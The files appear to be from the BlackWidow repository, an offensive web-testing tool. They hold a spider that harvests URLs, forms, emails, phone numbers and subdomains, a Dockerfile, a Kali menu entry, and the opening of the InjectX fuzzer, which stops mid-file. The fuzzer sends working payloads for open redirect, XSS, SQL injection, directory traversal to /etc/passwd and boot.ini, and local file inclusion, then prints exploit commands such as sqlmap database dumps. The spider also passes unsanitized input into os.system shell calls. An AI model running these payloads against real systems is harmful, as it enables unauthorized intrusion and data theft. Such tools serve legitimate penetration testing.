[FILE_START] blackwidow
meta: size=13723
#!/usr/bin/python3
# blackwidow by @xer0dayz - Last Updated 20200717
# https://sn1persecurity.com
#

from bs4 import BeautifulSoup
from urllib.parse import urlparse
import requests, sys, os, atexit, optparse
from http import cookies

requests.packages.urllib3.disable_warnings()

OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
COLOR1='\033[95m'
COLOR2='\033[96m'
RESET='\x1b[0m'

def readlinks (url):
  try:

    if len(cookies) > 2:
      headers = {'Cookie': cookies}
      r = requests.get(url, headers=headers, verify=False)
    else:
      r  = requests.get(url, verify=False)

    data = r.text
    soup = BeautifulSoup(data, "lxml")
    parsed_uri = urlparse(url)
    domain = '{uri.netloc}'.format(uri=parsed_uri)
    domain = domain.split(':')[0]
  except Exception as ex:
    print(ex)

  urls = open("/tmp/" + domain + "_" + port + "-urls.txt","w+")
  urls_saved = open(save_dir + domain + "_" + port + "-urls.txt","a")
  forms_saved = open(save_dir + domain + "_" + port + "-forms.txt","a")
  dynamic_saved = open(save_dir + domain + "_" + port + "-dynamic.txt","a")
  emails_saved = open(save_dir + domain + "_" + port + "-emails.txt","a")
  phones_saved = open(save_dir + domain + "_" + port + "-phones.txt","a")
  subdomains_saved = open(save_dir + domain + "_" + port + "-subdomains.txt","a")

  print ("")
  print (OKGREEN + "==================================================================================================" + RESET)
  print (OKGREEN + url)
  print (OKGREEN + "==================================================================================================" + RESET)
  for form in soup.find_all('form'):
    #print (OKBLUE + "[+] Extracting form values...")
    #print ("__________________________________________________________________________________________________" + OKORANGE)
    #print (form)
    #print (OKBLUE + "__________________________________________________________________________________________________")
    #print (RESET)
    forms_saved.write(url + "\n")

  # PARSE LINKS
  for link in soup.find_all('a'):
    # IF LINK IS NOT NULL
    if link.get('href') is not None:
      parsed_uri = urlparse(link.get('href'))
      linkdomain = '{uri.netloc}'.format(uri=parsed_uri)
      if (domain != linkdomain) and (linkdomain != "") and (domain in linkdomain):
        print (COLOR1 + "[+] Sub-domain found! " + linkdomain + " " + RESET)
        subdomains_saved.write(linkdomain + "\n")
      # IF LINK STARTS WITH HTTP
      if link.get('href')[:4] == "http":
        # SAME ORIGIN
        if domain in link.get('href'):
          # IF URL IS DYNAMIC
          if "?" in link.get('href'):
            print (OKRED + "[+] Dynamic URL found! " + link.get('href') + " " + RESET)
            urls.write(link.get('href') + "\n")
            urls_saved.write(link.get('href') + "\n")
            dynamic_saved.write(link.get('href') + "\n")
          else:
            print (link.get('href'))
            urls.write(link.get('href') + "\n")
            urls_saved.write(link.get('href') + "\n")
        # EXTERNAL LINK FOUND
        #else:
        # IF URL IS DYNAMIC
        #if "?" in link.get('href'):
        #print (COLOR2 + "[+] External Dynamic URL found! " + link.get('href') + " " + RESET)
        #else:
        #print (COLOR2 + "[i] External link found! " + link.get('href') + " " + RESET)
      # IF URL IS DYNAMIC
      elif "?" in link.get('href'):
        print (OKRED + "[+] Dynamic URL found! " + url + "/" + link.get('href') + " " + RESET)
        urls.write(url + "/" + link.get('href') + "\n")
        urls_saved.write(url + "/" + link.get('href') + "\n")
        dynamic_saved.write(url + "/" + link.get('href') + "\n")
      # DOM BASED LINK
      #elif link.get('href')[:1] == "#":
      #print (OKBLUE + "[i] DOM based link found! " + link.get('href') + " " + RESET)
      # TELEPHONE
      elif link.get('href')[:4] == "tel:":
        s = link.get('href')
        phonenum = s.split(':')[1]
        print (OKORANGE + "[i] Telephone # found! " + phonenum + " " + RESET)
        phones_saved.write(phonenum + "\n")
      # EMAIL
      elif link.get('href')[:7] == "mailto:":
        s = link.get('href')
        email = s.split(':')[1]
        print (OKORANGE + "[i] Email found! " + email + " " + RESET)
        emails_saved.write(email + "\n")
      # ELSE NORMAL LINK FOUND
      else:
        print (url + "/" + link.get('href'))
        urls.write(url + "/" + link.get('href') + "\n")
        urls_saved.write(url + "/" + link.get('href') + "\n")
  print (OKGREEN + "__________________________________________________________________________________________________" + RESET)

def readfile():
  filename = "/tmp/" + domain + "_" + port + "-urls.txt"
  with open(filename) as f:
    urls = f.read().splitlines()
    for url in urls:
      try:
        readlinks(url)
      except Exception as ex:
        print(ex)

def logo():
  version = "1.3"
  print (OKRED + "")
  print (OKRED + "")
  print (OKRED + "                _.._")
  print (OKRED + "              .'    '.")
  print (OKRED + "             /   __   \ ")
  print (OKRED + "          ,  |   ><   |  ,")
  print (OKRED + "         . \  \      /  / .")
  print (OKRED + "          \_'--`(  )'--'_/")
  print (OKRED + "            .--'/()\'--.")
  print (OKRED + "@xer0dayz  /  /` '' `\  \ ")
  print (OKRED + "             |        |")
  print (OKRED + "              \      /")
  print (OKRED + "")
  print (RESET)
  print (OKORANGE + " + -- --=[ https://sn1persecurity.com" + RESET)
  print (OKORANGE + " + -- --=[ blackwidow v" + version + " by @xer0dayz " + RESET)
  print (RESET)

def exit_handler():
  os.system('sort -u ' + save_dir + domain + "_" + port + '-urls.txt > ' + save_dir + domain + "_" + port + '-urls-sorted.txt 2>/dev/null')
  os.system('sort -u ' + save_dir + domain + "_" + port + '-forms.txt > ' + save_dir + domain + "_" + port + '-forms-sorted.txt 2>/dev/null')
  os.system('sort -u ' + save_dir + domain + "_" + port + '-dynamic.txt > ' + save_dir + domain + "_" + port + '-dynamic-sorted.txt 2>/dev/null')
  os.system('rm -f ' + save_dir + domain + "_" + port + '-dynamic-unique.txt 2>/dev/null')
  os.system('touch ' + save_dir + domain + "_" + port + '-dynamic-unique.txt')
  os.system('for a in `cat ' + save_dir + domain + "_" + port + '-dynamic-sorted.txt | cut -d \'?\' -f2 | sort -u | cut -d \'=\' -f1 | sort -u`; do for b in `egrep $a ' + save_dir + domain + "_" + port +'-dynamic.txt -m 1`; do echo $b >> ' + save_dir + domain + "_" + port + '-dynamic-unique.txt; done; done;')
  os.system('sort -u ' + save_dir + domain + "_" + port + '-subdomains.txt > ' + save_dir + domain + "_" + port + '-subdomains-sorted.txt 2>/dev/null')
  os.system('sort -u ' + save_dir + domain + "_" + port + '-emails.txt > ' + save_dir + domain + "_" + port + '-emails-sorted.txt 2>/dev/null')
  os.system('sort -u ' + save_dir + domain + "_" + port + '-phones.txt > ' + save_dir + domain + "_" + port + '-phones-sorted.txt 2>/dev/null')

  logo()
  print (OKGREEN + "[+] URL's Discovered: \n" + save_dir + domain + "_" + port + "-urls-sorted.txt" + RESET)
  print (OKGREEN + "__________________________________________________________________________________________________" + RESET)
  os.system('cat ' + save_dir + domain + "_" + port + '-urls-sorted.txt')
  print (RESET)
  print (OKGREEN + "[+] Dynamic URL's Discovered: \n" + save_dir + domain + "_" + port + "-dynamic-sorted.txt" + RESET)
  print (OKGREEN + "__________________________________________________________________________________________________" + RESET)
  os.system('cat ' + save_dir + domain + "_" + port + '-dynamic-sorted.txt')
  print (RESET)
  print (OKGREEN + "[+] Form URL's Discovered: \n" + save_dir + domain + "_" + port + "-forms-sorted.txt" + RESET)
  print (OKGREEN + "__________________________________________________________________________________________________" + RESET)
  os.system('cat ' + save_dir + domain + "_" + port + '-forms-sorted.txt')
  print (RESET)
  print (OKGREEN + "[+] Unique Dynamic Parameters Discovered: \n" + save_dir + domain + "_" + port + "-dynamic-unique.txt" + RESET)
  print (OKGREEN + "__________________________________________________________________________________________________" + RESET)
  os.system('cat ' + save_dir + domain + "_" + port + '-dynamic-unique.txt')
  print (RESET)
  print (OKGREEN + "[+] Sub-domains Discovered: \n" + save_dir + domain + "_" + port + "-subdomains-sorted.txt" + RESET)
  print (OKGREEN + "__________________________________________________________________________________________________" + RESET)
  os.system('cat ' + save_dir + domain + "_" + port + '-subdomains-sorted.txt')
  print (RESET)
  print (OKGREEN + "[+] Emails Discovered: \n" + save_dir + domain + "_" + port + "-emails-sorted.txt" + RESET)
  print (OKGREEN + "__________________________________________________________________________________________________" + RESET)
  os.system('cat ' + save_dir + domain + "_" + port + '-emails-sorted.txt')
  print (RESET)
  print (OKGREEN + "[+] Phones Discovered: \n" + save_dir + domain + "_" + port + "-phones-sorted.txt" + RESET)
  print (OKGREEN + "__________________________________________________________________________________________________" + RESET)
  os.system('cat ' + save_dir + domain + "_" + port + '-phones-sorted.txt')
  print (RESET)
  print (OKRED + "[+] Loot Saved To: \n" + save_dir + RESET)
  print (OKRED + "__________________________________________________________________________________________________" + RESET)
  print (RESET)

  os.system('rm -f ' + save_dir + domain + "_" + port + '-dynamic.txt')
  os.system('rm -f ' + save_dir + domain + "_" + port + '-forms.txt')
  os.system('rm -f ' + save_dir + domain + "_" + port + '-emails.txt')
  os.system('rm -f ' + save_dir + domain + "_" + port + '-phones.txt')
  os.system('rm -f ' + save_dir + domain + "_" + port + '-urls.txt')
  os.system('rm -f ' + save_dir + domain + "_" + port + '-subdomains.txt')
  os.system('rm -f /tmp/' + domain + "_" + port + '-urls.txt 2> /dev/null')

  if scan == "y":
    os.system('for a in `cat ' + save_dir + domain + "_" + port + '-dynamic-unique.txt`; do python3 /usr/bin/injectx.py -u $a; done;')
  else:
    pass

logo()
globalURL = "globalBadness"
if len(sys.argv) < 2:
  print ("You need to specify a URL to scan. Use --help for all options.")
  sys.exit()
else:
  parser = optparse.OptionParser()
  parser.add_option('-u', '--url',
                    action="store", dest="url",
                    help="Full URL to spider", default="")

  parser.add_option('-d', '--domain',
                    action="store", dest="domain",
                    help="Domain name to spider", default="")

  parser.add_option('-c', '--cookie',
                    action="store", dest="cookie",
                    help="Cookies to send", default="")

  parser.add_option('-l', '--level',
                    action="store", dest="level",
                    help="Level of depth to traverse", default="2")

  parser.add_option('-s', '--scan',
                    action="store", dest="scan",
                    help="Scan all dynamic URL's found", default="n")

  parser.add_option('-p', '--port',
                    action="store", dest="port",
                    help="Port for the URL", default="80")

  parser.add_option('-v', '--verbose',
                    action="store", dest="verbose",
                    help="Set verbose mode ON", default="y")

  options, args = parser.parse_args()
  target = str(options.url)
  domain = str(options.domain)
  cookies = str(options.cookie)
  max_depth = str(options.level)
  scan = str(options.scan)
  port = str(options.port)
  verbose = str(options.verbose)
  ans = scan
  level = 1

  # using a domain and a port or a URL?
  if ":" not in target:

    if len(str(target)) > 6:
      url = target + ":" + port #big change here

    else:
      url = "http://" + str(domain) + ":" + port

    if len(str(domain)) > 4:
      target = "http://" + domain + ":" + port
    else:
      print (target)
      urlparse(target)
      parsed_uri = urlparse(target)
      domain = '{uri.netloc}'.format(uri=parsed_uri)

  else:
    url = target
    globalURL = target
    parsed_uri = urlparse(target)
    domainWithPort = '{uri.netloc}'.format(uri=parsed_uri)
    domain = domainWithPort.split(':')[0]
    if (len(target.split(':')) > 2):
      portWithPossiblePath = target.split(':')[2]
      port = portWithPossiblePath.split('/')[0]
    else:
      port = port

  save_dir = "/usr/share/blackwidow/" + domain + "_" + port + "/"
  os.system('mkdir -p ' + save_dir + ' 2>/dev/null')
  atexit.register(exit_handler)


  # FILE INIT
  urls_file = "/tmp/" + domain + "_" + port + "-urls.txt"
  urls_saved_file = save_dir + domain + "_" + port + "-urls.txt"
  forms_saved_file = save_dir + domain + "_" + port + "-forms.txt"
  subdomain_file = save_dir + domain + "_" + port + "-subdomains.txt"
  emails_file = save_dir + domain + "_" + port + "-emails.txt"
  phones_file = save_dir + domain + "_" + port + "-phones.txt"
  urls = open(urls_file,"w+")
  urls.close()
  urls_saved = open(urls_saved_file,"w+")
  urls_saved.close()
  forms_saved = open(forms_saved_file,"w+")
  forms_saved.close()
  subdomains = open(subdomain_file,"w+")
  subdomains.close()
  emails = open(emails_file,"w+")
  emails.close()
  phones = open(phones_file,"w+")
  phones.close()


  try:
    readlinks(url)
  except Exception as ex:
    print(ex)

  while (int(level) <= int(max_depth)):
    level = level+1
    if (int(level) <= int(max_depth)):
      try:
        readfile()
      except Exception as ex:
        print(ex)
    else:
      break
[FILE_END] blackwidow

[FILE_START] blackwidow.desktop
meta: size=242
[Desktop Entry]
Name=blackwidow
Encoding=UTF-8
Exec=/usr/share/kali-menu/exec-in-shell "sudo blackwidow"
Icon=kali-www
StartupNotify=false
Terminal=true
Type=Application
Categories=03-webapp-analysis;
X-Kali-Package=blackwidow
Comment=
Path=
[FILE_END] blackwidow.desktop

[FILE_START] Dockerfile
meta: size=371
FROM alpine:3.10

RUN apk --update add --no-cache python3 py3-requests py3-pip py3-lxml py3-requests openssl ca-certificates
RUN apk --update add --virtual build-dependencies python3-dev build-base wget git \
  && git clone https://github.com/1N3/BlackWidow.git
WORKDIR BlackWidow

RUN pip3 install -r requirements.txt
ENTRYPOINT ["python3", "blackwidow"]
CMD ["--help"]
[FILE_END] Dockerfile

[FILE_START] injectx.py
meta: lang=py size=58132
#!/usr/bin/python3
# InjectX Fuzzer v20241124 by @xer0dayz
# https://sn1persecurity.com

from __future__ import print_function
from urllib.parse import urlparse
import urllib.request, sys, os, optparse
from socket import timeout

OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
COLOR1='\033[95m'
COLOR2='\033[96m'
COLOR3='\033[90m'
RESET='\x1b[0m'
VERBOSE='1'

def logo():
    print(OKORANGE + '      ____        _           __ _  __' + RESET)
    print(OKORANGE + '     /  _/___    (_)__  _____/ /| |/ /' + RESET)
    print(OKORANGE + '     / // __ \\  / / _ \\/ ___/ __/   / ' + RESET)
    print(OKORANGE + '   _/ // / / / / /  __/ /__/ /_/   |  ' + RESET)
    print(OKORANGE + '  /___/_/ /_/_/ /\\___/\\___/\\__/_/|_|  ' + RESET)
    print(OKORANGE + '         /_____/                     ' + RESET)
    print('')
    print(OKGREEN +   '--== Inject-X Fuzzer by @xer0dayz ==-- ' + RESET)
    print(OKGREEN +   '   --== https://sn1persecurity.com ==-- ' + RESET)
    print('')

if os.path.isfile("/tmp/injectx.txt"):
    os.remove("/tmp/injectx.txt")

f = open('/tmp/injectx.txt', 'w')

def active_scan():

    new_url = base_url

    # Open Redirect 1 ######################################################################################
    try:
        redirect_exploit = urllib.parse.quote("google.com")

        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(redirect_exploit) + RESET)

        redirect_url = new_url.replace("INJECTX", redirect_exploit)
        http_request = urllib.request.urlopen(redirect_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_status = http_request.getcode()
        http_length_diff = str(http_length_base - http_length)

        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + redirect_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "<title>Google</title>" in http_response:
            print(OKRED + "[+] Open Redirect Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + redirect_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s -I '" + redirect_url + "' | egrep location --color=auto")
            f.write("P3 - MEDIUM, Open Redirect, " + str(redirect_url) + ", " + str(http_status) + "\n")

    except:
        pass

    # Open Redirect 2 ######################################################################################
    try:
        redirect_exploit = urllib.parse.quote("//google.com")

        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(redirect_exploit) + RESET)

        redirect_url = new_url.replace("INJECTX", redirect_exploit)
        http_request = urllib.request.urlopen(redirect_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_status = http_request.getcode()
        http_length_diff = str(http_length_base - http_length)

        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + redirect_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "<title>Google</title>" in http_response:
            print(OKRED + "[+] Open Redirect Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + redirect_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s -I '" + redirect_url + "' | egrep location --color=auto")
            f.write("P3 - MEDIUM, Open Redirect, " + str(redirect_url) + ", " + str(http_status) + "\n")

    except:
        pass

    # Open Redirect 3 ######################################################################################
    try:
        redirect_exploit = urllib.parse.quote("https://google.com")

        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(redirect_exploit) + RESET)

        redirect_url = new_url.replace("INJECTX", redirect_exploit)
        http_request = urllib.request.urlopen(redirect_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_status = http_request.getcode()
        http_length_diff = str(http_length_base - http_length)

        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + redirect_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "<title>Google</title>" in http_response:
            print(OKRED + "[+] Open Redirect Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + redirect_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s -I '" + redirect_url + "' | egrep location --color=auto")
            f.write("P3 - MEDIUM, Open Redirect, " + str(redirect_url) + ", " + str(http_status) + "\n")

    except:
        pass

    # XSS ######################################################################################

    try:
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(payload) + RESET)

        http_request = urllib.request.urlopen(new_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_status = http_request.getcode()
        http_length_diff = str(http_length_base - http_length)
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + new_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        # CHECK FOR REFLECTED VALUE
        if payload in http_response:
            print(OKGREEN + "[+] Reflected Value Detected! " + RESET)
            f.write("P5 - INFO, Reflected Value Detected, " + str(new_url) + ", Payload: " + str(payload) + "\n")

            # IF REFLECTED, TRY HEURISTIC STRING
            payload_exploit_unencoded = '</INJECTX>(1)'
            payload_exploit = '%22%3E%3C%2FINJECTX%3E%281%29'
            xss_url = new_url.replace("INJECTX", payload_exploit)

            try:
                http_request = urllib.request.urlopen(xss_url)
                http_response = str(http_request.read())
                http_length = len(http_response)
                http_length_diff = str(http_length_base - http_length)
                http_status = http_request.getcode()
                if (verbose == "y"):
                    print(COLOR2 + "[i] New URL: " + xss_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

            except:
                pass

            # CONTINUE TO XSS EXPLOITATION
            if payload_exploit_unencoded in http_response:
                payload_exploit2 = urllib.parse.quote('"><iframe/onload=alert(1)>')
                xss_url2 = new_url.replace("INJECTX", payload_exploit2)

                try:
                    http_request = urllib.request.urlopen(xss_url2)
                    http_response = str(http_request.read())
                    http_length = len(http_response)
                    http_length_diff = str(http_length_base - http_length)
                    http_status = http_request.getcode()

                    if (verbose == "y"):
                        print(COLOR2 + "[i] New URL: " + xss_url2 + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

                    print(OKRED + "[+] XSS Found! ", str(payload_exploit2) + RESET)
                    print(OKRED + "[+] Vulnerable URL: " + xss_url2 + RESET)
                    print(OKGREEN + "[c] Exploit Command: firefox '" + xss_url2 + "' & ")
                    os.system("curl -s '" + xss_url2 + "' | egrep alert\\(1\\) --color=auto")
                    f.write("P3 - MEDIUM, Cross-Site Scripting (XSS), " + str(xss_url2) + ", " + str(payload_exploit2) + "\n")
                    #os.system("firefox '" + xss_url2 + "' > /dev/null 2> /dev/null")
                except:
                    pass

    except:
        pass

    # SQLi ######################################################################################
    try:
        sqli_exploit = '\''
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(sqli_exploit) + RESET)

        sqli_url = new_url.replace("INJECTX", sqli_exploit)
        http_request = urllib.request.urlopen(sqli_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + sqli_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "SQL" in http_response or http_status == 500 or http_status == 503:
            print(OKRED + "[+] SQL Injection Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + sqli_url + RESET)
            sqlmap_command = 'sqlmap --batch --dbs -u "' + full_url + '"'
            print(OKGREEN + "[c] Exploit Command: " + sqlmap_command)
            #os.system(sqlmap_command)
            f.write("P2 - HIGH, SQL Injection, " + str(sqli_url) + ", " + str(full_url) + "\n")

    except:
        pass

    # SQLi 2 ######################################################################################
    try:
        sqli_exploit = '\\'
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(sqli_exploit) + RESET)

        sqli_url = new_url.replace("INJECTX", sqli_exploit)
        http_request = urllib.request.urlopen(sqli_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + sqli_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "SQL" in http_response or http_status == 500 or http_status == 503:
            print(OKRED + "[+] SQL Injection Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + sqli_url + RESET)
            sqlmap_command = 'sqlmap --batch --dbs -u "' + full_url + '"'
            print(OKGREEN + "[c] Exploit Command: " + sqlmap_command)
            #os.system(sqlmap_command)
            f.write("P2 - HIGH, SQL Injection, " + str(sqli_url) + ", " + str(full_url) + "\n")

    except:
        pass

    # Windows Directory Traversal ######################################################################################
    try:
        traversal_exploit = '/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\\\boot.ini'
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(traversal_exploit) + RESET)

        traversal_url = new_url.replace("INJECTX", traversal_exploit)
        http_request = urllib.request.urlopen(traversal_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + traversal_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "boot loader" in http_response or "16-bit" in http_response:
            print(OKRED + "[+] Windows Directory Traversal Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + traversal_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + traversal_url + "' | egrep Windows --color=auto")
            f.write("P2 - HIGH, Directory Traversal, " + str(traversal_url) + ", " + str(traversal_exploit) + "\n")

    except:
        pass

    # Windows Directory Traversal 2 ######################################################################################
    try:
        traversal_exploit = '/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\\\boot.ini%00'
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(traversal_exploit) + RESET)

        traversal_url = new_url.replace("INJECTX", traversal_exploit)
        http_request = urllib.request.urlopen(traversal_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + traversal_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "boot loader" in http_response or "16-bit" in http_response:
            print(OKRED + "[+] Windows Directory Traversal Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + traversal_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + traversal_url + "' | egrep Windows --color=auto")
            f.write("P2 - HIGH, Directory Traversal, " + str(traversal_url) + ", " + str(traversal_exploit) + "\n")

    except:
        pass

    # Windows Directory Traversal 3 ######################################################################################
    try:
        traversal_exploit = '..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00test.htm'
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(traversal_exploit) + RESET)

        traversal_url = new_url.replace("INJECTX", traversal_exploit)
        http_request = urllib.request.urlopen(traversal_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + traversal_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "boot loader" in http_response or "16-bit" in http_response or "16-bit" in http_response:
            print(OKRED + "[+] Windows Directory Traversal Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + traversal_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + traversal_url + "' | egrep Windows --color=auto" + RESET)
            f.write("P2 - HIGH, Directory Traversal, " + str(traversal_url) + ", " + str(traversal_exploit) + "\n")

    except:
        pass

    # Windows Directory Traversal 4 ######################################################################################
    try:
        traversal_exploit = '..%2fWEB-INF%2fweb.xml'
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(traversal_exploit) + RESET)

        traversal_url = new_url.replace("INJECTX", traversal_exploit)
        http_request = urllib.request.urlopen(traversal_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + traversal_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "<web-app" in http_response:
            print(OKRED + "[+] Windows Directory Traversal Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + traversal_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + traversal_url + "' | egrep Windows --color=auto" + RESET)
            f.write("P2 - HIGH, Directory Traversal, " + str(traversal_url) + ", " + str(traversal_exploit) + "\n")

    except:
        pass

    # Linux Directory Traversal ######################################################################################
    try:
        traversal_exploit = '/../../../../../../../../../../../../../../../../../etc/passwd'
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(traversal_exploit) + RESET)

        traversal_url = new_url.replace("INJECTX", traversal_exploit)
        http_request = urllib.request.urlopen(traversal_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + traversal_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "root:" in http_response:
            print(OKRED + "[+] Linux Directory Traversal Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + traversal_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + traversal_url + "' | egrep root --color=auto" + RESET)
            f.write("P2 - HIGH, Directory Traversal, " + str(traversal_url) + ", " + str(traversal_exploit) + "\n")

    except:
        pass

    # Linux Directory Traversal 2 ######################################################################################
    try:
        traversal_exploit = '/../../../../../../../../../../../../../../../../../etc/passwd%00'
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(traversal_exploit) + RESET)

        traversal_url = new_url.replace("INJECTX", traversal_exploit)
        http_request = urllib.request.urlopen(traversal_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + traversal_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "root:" in http_response:
            print(OKRED + "[+] Linux Directory Traversal Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + traversal_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + traversal_url + "' | egrep root --color=auto" + RESET)
            f.write("P2 - HIGH, Directory Traversal, " + str(traversal_url) + ", " + str(traversal_exploit) + "\n")

    except:
        pass

    # LFI Check ######################################################################################
    try:
        rfi_exploit = '/etc/passwd'
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(rfi_exploit) + RESET)

        rfi_url = new_url.replace("INJECTX", rfi_exploit)
        http_request = urllib.request.urlopen(rfi_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + rfi_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "root:" in http_response:
            print(OKRED + "[+] Linux Local File Inclusion Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + rfi_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + rfi_url + "' | egrep 'root:' --color=auto" + RESET)
            f.write("P2 - HIGH, Local File Inclusion, " + str(rfi_url) + ", " + str(rfi_exploit) + "\n")

    except:
        pass

    # LFI Check 2 ######################################################################################
    try:
